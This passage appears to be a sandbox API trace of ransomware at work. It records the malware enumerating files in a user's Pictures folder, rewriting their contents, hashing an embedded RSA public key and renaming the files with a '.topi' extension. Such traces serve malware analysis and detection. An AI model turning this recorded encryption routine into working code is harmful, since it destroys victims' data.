HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.623] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x14848, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x14848, lpOverlapped=0x0) returned 1 [0095.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.624] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1484d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.624] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.624] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.624] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.624] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.624] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.624] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.624] CloseHandle (hObject=0x6a8) returned 1 [0095.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0095.631] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0095.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0095.631] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pT2jCSlE056d3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt2jcsle056d3.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pT2jCSlE056d3.bmp.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt2jcsle056d3.bmp.topi")) returned 1 [0095.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.631] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.631] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.632] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57b3770, ftCreationTime.dwHighDateTime=0x1d5c3f6, ftLastAccessTime.dwLowDateTime=0x8b429110, ftLastAccessTime.dwHighDateTime=0x1d5c18e, ftLastWriteTime.dwLowDateTime=0x8b429110, ftLastWriteTime.dwHighDateTime=0x1d5c18e, nFileSizeHigh=0x0, nFileSizeLow=0x1648a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SIycULiQEhQ8CmPzS.jpg", cAlternateFileName="SIYCUL~1.JPG")) returned 1 [0095.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.633] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.633] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SIycULiQEhQ8CmPzS.jpg") returned=".jpg" [0095.633] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SIycULiQEhQ8CmPzS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\siyculiqehq8cmpzs.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.633] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=91274) returned 1 [0095.633] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.635] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x16464, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.636] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.636] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.636] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x1648a, lpOverlapped=0x0) returned 1 [0095.637] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.637] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.637] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.637] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.637] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0095.638] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.638] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.638] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.638] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.638] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.638] GetLastError () returned 0x0 [0095.638] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.638] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0095.638] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.638] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.638] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.639] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16490) returned 0x9a06a00 [0095.639] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.639] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1f08 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9570 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1f50 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9588 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95b8 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95d0 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.639] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.639] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95b8 | out: hHeap=0x680000) returned 1 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95d0 | out: hHeap=0x680000) returned 1 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d95d0 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d95b8 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95d0 | out: hHeap=0x680000) returned 1 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95b8 | out: hHeap=0x680000) returned 1 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.640] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.640] GetCurrentThreadId () returned 0x8c4 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6850 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.641] GetCurrentThreadId () returned 0x8c4 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95b8 [0095.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95d0 [0095.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95a0 [0095.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.642] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SIycULiQEhQ8CmPzS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\siyculiqehq8cmpzs.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SIycULiQEhQ8CmPzS.jpg.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\siyculiqehq8cmpzs.jpg.topi")) returned 1 [0095.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.643] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.644] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3d4b310, ftCreationTime.dwHighDateTime=0x1d5c001, ftLastAccessTime.dwLowDateTime=0x1c07bee0, ftLastAccessTime.dwHighDateTime=0x1d5bf56, ftLastWriteTime.dwLowDateTime=0x1c07bee0, ftLastWriteTime.dwHighDateTime=0x1d5bf56, nFileSizeHigh=0x0, nFileSizeLow=0x5cac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sq-jj8OfS5nH5F.jpg", cAlternateFileName="SQ-JJ8~1.JPG")) returned 1 [0095.644] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sq-jj8OfS5nH5F.jpg") returned=".jpg" [0095.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\sq-jj8OfS5nH5F.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sq-jj8ofs5nh5f.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.644] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=23724) returned 1 [0095.644] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.647] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5c86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.647] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.649] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0095.649] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.649] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.649] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.649] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.650] GetLastError () returned 0x0 [0095.650] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.650] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0095.650] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.650] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.650] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.650] RtlAllocateHeap 